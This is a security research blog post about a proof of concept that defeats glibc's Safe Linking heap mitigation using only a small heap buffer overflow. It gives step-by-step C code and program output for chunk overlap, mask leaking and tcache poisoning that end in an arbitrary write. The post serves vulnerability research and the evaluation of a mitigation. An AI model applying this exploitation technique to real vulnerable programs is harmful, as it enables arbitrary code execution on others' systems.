Bypassing the upcoming Safe Linking mitigation

Robert Crandall
May 29, 2020
14 min read

Updated: Jun 1, 2020

On 21 May 2020, Check Point Research published a write up about the integration of the Safe Linking mitigation into glibc 2.32, scheduled for release this upcoming August. The fundamental idea is that the singly linked lists in the heap (like tcache and fastbin) now have their fd pointers XOR'd with the randomized ASLR bits of the address storing said pointer. This means that an attacker can no longer obtain an arbitrary address from malloc by overwriting a chunk's fd pointer with that arbitrary value. This provided a method for arbitrary read/write that could result in arbitrary code execution.

It is an acknowledged limitation of Safe Linking that some type of additional heap leak can allow an attacker to bypass it. However, we have created a 64-bit proof-of-concept (PoC) showing that a single heap buffer overflow vulnerability can be enough to bypass Safe Linking if an attacker has sufficient control over the lifetime of heap objects. This post will present a walk through of the PoC, including an additional demonstration of the limitations of using the heap base as the random mask (XOR) value.

The Bare Minimum™ Intro to glibc and Safe Linking

To understand this article, a background knowledge of the Safe Linking mitigation and glibc structures and mitigation is required. Here is a very brief introduction to the required concepts.

Tcache

The tcache was introduced in glibc 2.26. It is a per-thread structure and contains several bins, each of which are last-in, first-out (LIFO), singly-linked lists and hold up to seven free chunks of a bin-specific size. The max bin size is 0x408. It is the first source to satisfy an allocation request, and also the first destination to hold a newly freed chunk.

Unsorted Bin

Once the tcache is full, the unsorted bin will hold newly freed chunks. If two memory-adjacent chunks are freed, the unsorted bin will consolidate those into one large chunk that it will retain. Although there are additional nuances and interest in the unsorted bin for other exploitation techniques, in this PoC, we use the unsorted bin solely for this consolidating characteristic.

malloc_chunk

This structure represents a chunk of memory returned by malloc and contains the requisite metadata needed to free the chunk later. Most of these fields are only meaningful when the chunk is free, otherwise they will hold user data.

struct malloc_chunk {

  INTERNAL_SIZE_T      mchunk_prev_size;  // Size of previous chunk (if free).
  INTERNAL_SIZE_T      mchunk_size;       // Size in bytes, including overhead.

  struct malloc_chunk* fd;         // double links -- used only if free.
  struct malloc_chunk* bk;

  // Only used for large blocks: pointer to next larger size.
  struct malloc_chunk* fd_nextsize; // double links -- used only if free.
  struct malloc_chunk* bk_nextsize;
};

glibc malloc.c source code

Specifically for this PoC, it is important to know:

mchunk_prev_size overlaps the last eight bytes of user data in the previous chunk
Because the tcache is singly linked, it only uses the fd pointer
The fd field overlaps the first eight bytes of user data, that is, the first bytes at the address returned by malloc
The algorithms for freeing and consolidating have integrity checks to confirm the values used have not been corrupted. These require additional steps to bypass, and will be explained later below

Safe Linking

P represents the pointer value that would be held in the fd field of a free chunk. L represents the address of the fd field itself. L >> 12 is the right shifted value of L and is used to XOR P resulting in an encoded pointer, P'. Safe Linking stores this P' value in the fd field.

The Original "Unmasking" Hypothesis

While looking at the masking example in Figure 6 of Check Point Research's article, we realized that the red bytes were not fully accurate in representing the randomness of P'. The image is duplicated here for reference.

Figure 6 from Check Point Research's original article

In P', we see that the nibbles 0xBA9 are all XOR'd with zero due to the shift by PAGE_SHIFT (here, twelve). Additionally, we know that the 0x87 in P will be XOR'd against those highest (and unmodified by ASLR) nibbles 0xBA. We can therefore 'undo' the masking of the nibbles 0x3D in P' by XOR'ing it again with 0xBA to retrieve the original nibbles 0x87 in P. Therefore, if P and L start with the same byte as assumed by the highlighting in Figure 6, the only truly randomized and unpredictable nibbles in P' are 0xBA93DFD35753.

However, this can be taken a step further. As long as P and L have nibbles in common, we can iteratively apply that shift and XOR operation against subsequent nibble pairs to recover the original value. In fact, when P and L are on the same memory page (as shown in the Figure 6 example), we can decode so much of it that we can actually recover the value for L >> 12 purely from leaking P'! The potential locality of sequential malloc and free calls, added to the fact that tcache chunks must be smaller than 0x408 bytes, make it plausible that L and P may reside on the same page (possibly affected by an attacker's ability to influence the heap). The PoC includes a demo to decode any given P' with this assumption.

Remember though, it is a known weakness that a buffer overflow combined with a heap leak is sufficient to defeat Safe Linking. Because it may be easier to leak P' than L, (since P' overlaps the first eight bytes of the buffer returned from malloc to the user), the ability to derive L >> 12 from P' is noteworthy. But what if we only have a single heap buffer overflow vulnerability?

Bypassing Safe Linking With Only a Buffer Overflow

With sufficient control over the allocation/deallocation of objects and reading/writing the fields in those objects, it is possible to bypass Safe Linking with a single heap buffer overflow. The PoC was tested against the master branch of glibc from 21 May 2020 (commit 76d5b2f002a1243ddba06bd646249553353f4322). It also works against glibc 2.31, as the L >> 12 mask will simply be 0 since there is no PROTECT_PTR macro.

The general goal is to leverage the buffer overflow to ultimately create overlapping chunks, which lets us retain two pointers to the same chunk. Though we will use this to read/write P' through use-after-free (UAF) and double-free techniques, it is important to note that the original program contains no UAF or double-free and we are not leveraging a second vulnerability besides the buffer overflow. (We will, however, trigger the buffer overflow twice to bypass a different glibc mitigation.)

Step 1 - Allocate our A, B, C, and D chunks and fill up the tcache bin

Recall that the tcache has several bins that each hold up to seven chunks of the same size. We need to fill this up with free chunks. We also need four contiguous chunks (A, B, C, and D) that we will use for our buffer overflows and consolidated in the unsorted bin.

// Allocate enough chunks that, when freed, will fill tcache bin
// Size needs to be large enough that freed chunks will go into
// unsorted bin after tcache is ful
for( int i = 0; i < 7; i++) {
    tcache_allocs[i] = malloc(0x98);
}

// Allocate a, b, c, and d into contiguous memory. The plans are:
//    - a will be used for a buffer overflow into b, to overcome 
//      the "corrupted size vs. previous size while
//      consolidating" mitigation
//    - b will be freed legitimately into unsorted bin, and
//      eventually consolidated
//    - c will become an overlapping chunk and leveraged into 
//     a coerced UAF
//    - d will be corrupted by a legit buffer overflow, freed
//      into unsorted list, and consolidated with chunks c and d
char *a = malloc(0x98);
char *b = malloc(0x98);
char *c = malloc(0x98);
char *d = malloc(0xb8);

// Fill up the tcache bin
for( int i = 0; i < 7; i++) {
    free(tcache_allocs[i]);
    tcache_allocs[i] = 0;

Step 2 - Free B into the unsorted bin

Now that our tcache bin is free, subsequent frees of this size will go into the unsorted bin. This is important, because contiguous free malloc_chunks are consolidated when added to the unsorted bin.

// Release B into unsorted bin
free(b);
b = NULL;

Step 3 - Trigger buffer overflow from C over D and create fake chunk

We simulate a buffer overflow vulnerability, overwriting one byte past C and corrupting D's metadata mchunk_size from:

0xc1 (size 0xc0 and PREV_INUSE flag set)

to:

 0xa0 (size 0xa0 and PREV_INUSE cleared)

The payload also overwrites D's mchunk_prev_size field to 0x140 which will encompass chunks B, C, and D. (Recall the mchunk_prev_size field overlaps the last eight bytes accessible from C's usable buffer.)

With this altered size, we also need to create fake chunk metadata at offset 0x98 in D to successfully pass heap consistency checks.

// Simulate a buffer overflow (only over by 1 byte)
memcpy(c, payload, 0x99);

// Create a fake chunk in D, because it will be checked
// for consistency (PREV_INUSE must be set)
// 0x21 + new corrupt size (0xa0) == 0xc0, the original size
d[0x98] = '\x21';

Step 4 - Trigger same buffer overflow again from A over B

A backwards consolidation check was introduced in glibc 2.29, which will abort if the mchunk_prev_size of D does not match the size of B in our example. To bypass this, we need to corrupt B's size. Since A and C are both the same size, this mimics using the same buffer overflow on the same type of object twice, as opposed to two separate overflows on objects of different sizes (we overflow two bytes here).

// Buffer overflow from A into B, to corrupt its size so it
// will match d's corrupted prev_size
memcpy(a, payload2, 0x9a);

Step 5 - Consolidate B, C, and D into one chunk in the unsorted bin

We are now able to trigger the free on D, which will consolidate with the corrupted and free'd B chunk and overlap our still allocated C chunk.

// Free D, causing it to be consolidated into one big chunk,
// still in the unsorted bin
free(d);
d = NULL;

Step 6 - Manufacture a UAF scenario using overlapping chunks

glibc's first-fit algorithm will satisfy malloc requests by splitting a large chunk in the unsorted bin into two pieces, returning a chunk for the requested size and retaining a chunk with the remaining space. We leverage this to create overlapping chunks over C, giving us two simultaneous pointers to the same chunk.

Note: Instead of this UAF scenario, the P' could be obtained in a scenario where malloc returns a user buffer, but the first eight bytes are not initialized. This is expected to be a significantly rarer scenario, and could be considered a separate info leak vulnerability.

Step 6a - Empty the tcache

First, we must empty the tcache before malloc requests will be serviced by the unsorted bin.

// Allocate all of the tcache chunks to empty it out
for( int i = 0; i < 7; i++) {
    tcache_allocs[i] = malloc(0x98);
}

Step 6b - Allocate B again to split the consolidated chunk

Now, leverage the first-fit behavior to retrieve the equivalent of the B chunk back again, leaving a consolidated C and D chunk in the unsorted bin.

// Now, when we request again for the original size of B, it
// splits the unsorted bin entry
char *junk = malloc(0x98);

Step 6c - Allocate C2, giving us overlapping chunks

Leverage first-fit behavior again to get another chunk at the same location, and of the same size, as C. We'll call this C2. The unsorted bin will still have the free'd D chunk in it. Because our original C pointer was never freed, we now have two pointers to the same location, allowing us to free one and then read/write in the chunk with the other!

// Request another chunk same size as original C, now we
// have two pointers to C!
char *c2 = malloc(0x98);

Step 7 - Leak the L >> 12 mask and prepare masked pointer

Now armed with C and C2, we can leak P', the encoded pointer that Safe Linking writes in a free chunk's fd field. Then we can derive L and use it to encode any value we want and store it in C->fd.

Note: Remember this L value is specific to this chunk (or, at least, any chunk on that same page) and won't pass the correct checks if used on a different page/heap.

Step 7a - Free C2 into the empty tcache bin

First, we free C2, which goes into the empty tcache bin.

// Free c2, which is moved into the now-open tcache bin
free(c2);
c2 = NULL;

Step 7b - Read L >> 12 using original C pointer

We can now read C2->fd simply by reading the first eight bytes in C. This is the encoded P' value.

Except C2 is the only chunk in the tcache, so P is NULL. This means that the encoded pointer is:

P' == L >> 12 ^ P == L >> 12 ^ 0 == L >> 12

We don't need to do any unmasking, nor leak the address L. We can use L >> 12 to mask our own pointers for this chunk!

// Read the P' value in the fd pointer location using original C
// Except, it already contains L >> 12! Since it was
// the only chunk in the tcache bin, it protected a NULL
// ptr which wrote the unmodified mask.
uint64_t L12 = *(int64_t *)c;

Step 7c - Mask our arbitrary pointer

Simply XOR the leaked L12 with our arbitrary address to obtain a valid encoded pointer.

Note: This isn't exactly arbitrary. It still needs to be aligned to a 16-byte boundary to pass the alignment check in tcache_get(). However, since we are allocating a buffer large enough to be in the unsorted bin, we could round down to the nearest 0x10 boundary and perform the subsequent read/write at an offset into that buffer to reach the targeted address (see full PoC source code for an example)

// Now mask the arbitrary address we want to write to
uint64_t masked_ptr = L12 ^ (uint64_t) &arbitrary_variable;

Step 8 - Set up a valid tcache chain, then corrupt it with our masked pointer

The tcache structure includes not only a linked list of available chunks (tcache->entries), but also has a parallel array holding the current length of each bin (tcache->counts). Although we could overwrite the C2->fd right now, the value we write will not be returned as a malloc chunk because tcache->counts says there is only the C2 chunk in the tcache. We must add an additional chunk to the bin in order to have a valid count.

Step 8a - Allocate again to remove C2 from tcache

Double-free mitigations exist that prevent the same tcache bin from inserting the same chunk twice. We allocate another variable, removing C2 from the tcache. We call this C3, and thus we retain two active pointers to the same chunk (C and C3).

// Allocate to get that copy-of-C chunk out of the tcache.
// we need to make the tcache count valid, so we need to put some
// chunk back in the tcache first, then put a copy of our C chunk
// in it with fd set appropriately (since tcache is LIFO)
uint64_t *c3 = malloc(0x98);

Step 8b - Free one of the seven previously allocated pointers so tcache has an entry

//  Can't just add a fd ptr to a chunk and then have it be
//  used if count is 0. So, here we add a chunk to the
// tcache list. Doesn't matter which one.
free(tcache_allocs[0]);
tcache_allocs[0] = NULL;

Step 8c - Free C3, which will have fd pointing at that chunk from step 8b

Because the tcache is LIFO, freeing C3 will insert it at the head of the list, and set C3->fd to the address of the freed tcache_allocs[0].

// NOW put the copy-of-C chunk back into the tcache
free(c3);
c3 = NULL;

Step 9 - Overwrite C3->fd with our masked pointer using C pointer

We perform the overwrite of C3->fd through our our pointer to C which has remained allocated for the entire lifetime of this program.

// Now we write the pointer into the fd of the tcache'd chunk
// we still have access to.
*(uint64_t *) c = masked_ptr;

Step 10 - Remove C3 to get the arbitrary address

So close! We just need to make an allocation to remove the C3 chunk just added to tcache. Then, the allocation after that will return our arbitrary address.

// malloc to take that chunk out. should still be a copy of C
char *junk2 = malloc(0x98);

// Finally, malloc again to get our arbitrary address
uint64_t *winner = malloc(0x98);

Step 11 - VictoRII!

We can now perform an arbitrary read/write! Remember, if you needed to round down the address in step 7c, you will need to write at some winner[offset].

// And write something arbitrary!
*winner = 0x112233445566;

PoC Example Output

An example output of the source code included below. The following PoC demonstrates both the P' decoding, as well as the Safe Linking bypass using a single heap buffer overflow vulnerability. It is presented in a how2heap format, with descriptive tutorial-like messages being printed along the way. This PoC also uses a misaligned arbitrary address, proving the claims made in step 7c above. It thus contains some minor differences and refactors compared to the inlined code above.

Decoder Example

Enter hexadecimal P' value (without leading 0x): ba93dfd35753

The L >> 12 value for P' "ba93dfd35753" is ba9876543

Bypass Example

Safe Linking bypass using only a 2-byte heap buffer overflow

Arbitrary variable address is 0x7f851d406018 and its value is 0x11111111
Allocating 7 items to fill the tcache when they are eventually freed...
Allocating 4 contiguous allocations (chunks A, B, C, D) to use for buffer overflows and overlapping chunks...
Freeing the 7 items so tcache is full...
Freeing B (0x7f851d6affc0) into unsorted bin, since tcache is full.

Now simulating a buffer overflow vulnerability
We will overflow from C (malloc(0x98)) into D (malloc(0xb8))
We are only overflowing 2 bytes, writing a custom size into D (shorter than orig size).
We are also overwriting the prev_size field to 0x140 so it will attempt to consolidate B, C, and D.

Since chunkD is a usable buffer that we still have a pointer to, we create a fake chunk inside it.
This is at the offset matching the custom size we just wrote.
The 0x21 we write here represents a fake next chunk's size field, and satisfies two conditions:
  - ends in 0x1 (setting PREV_IN_USE), and
  - when added to the custom size we overwrote, actually lands on the legit next chunk after chunkD

Now, we have to trigger a second buffer overflow. This will be used to bypass some security checks
performed when consolidating backwards. We must overwrite the original size of chunk B to match what
chunk D is saying it is.

Freeing chunk D (0x7f851d6b0100), causing it to consolidate everything from B, over C, and including up to
the fake chunk boundary inside D.

Our tcache for this bin size is full, so allocating 7 more items to empty it...
The next allocation will be carved out from the consolidated chunk (B, C, and fake DD) in unsorted bin.
This new ptr should match chunk B above: 0x7f851d6affc0

By asking for another chunk of the same size as C we get...
Two pointers to the same chunk! We have our original C, and this new C2.

Chunk C is at 0x7f851d6b0060 and chunk C2 is at 0x7f851d6b0060

We are going to free one of those pointers (C2) which will put it in the emptied tcache bin.
PROTECT_PTR() is going to protect this chunk's fd ptr... which is NULL.
Meaning it will do the L>>12 calculation, and XOR it with 0, writing L>>12 unmodified...
Which we can recover using our original C pointer

L >> 12 for chunk C is 0x7f851d6b0

Now we can use that to mask any arbitrary address we want (well, sort of, it does need to pass an alignment check),
but since we'll be allocating a relatively large buffer (0x98), we can just round it down and then write at
the necessary offset to get a truly arbitrary write-what-where

Masked arbitrary variable address is 0x7f82e511b6a0

We need to put a legitimate chunk back in the tcache, so that our freed chunk can have its fd ptr overwritten.
BUT we need to take out the C2 that we just freed into the tcache or else we'll trigger a double-free security
check trying to put two copies of C in the tcache bin at the same time.

Now we have a C3 ptr (0x7f851d6b0060).

Free one of the 7 tcache allocs we used to empty the tcache earlier...
And put C3 back onto the tcache bin, and due to LIFO, C3->fd will point to a legitimate chunk.
Since we still have the original C ptr, we can now write the masked ptr to offset 0 of C and overwrite the
fd ptr of the freed C3 in the tcache.

Malloc once to remove the C3 out of the LIFO...

And finally malloc one more time to get access to our arbitrary address.
This winning chunk is located at 0x7f851d406010 and we can write anything we want here...

Arbitrary variable now contains 0x112233445566

Conclusion

The Safe Linking mitigation does indeed raise the bar for heap exploitation through the singly linked lists in tcache. Previously, limited control of heap layout was sufficient to clobber the fd pointer and achieve arbitrary read/write, and we see that this PoC required detailed control over the lifetime of objects and the ability to place chunks A, B, C, and D contiguously in memory. In addition to that, we needed the ability to read and write at various offset within those chunks.

It is a known and accepted limitation that Safe Linking can be bypassed with a separate heap leak capability. We demonstrated, however, that in the right circumstances, it is possible to bypass the Safe Linking mechanism with only a small buffer overflow (two non-NULL bytes) and obtain an arbitrary read/write primitive.

The source code for the PoC is available for download.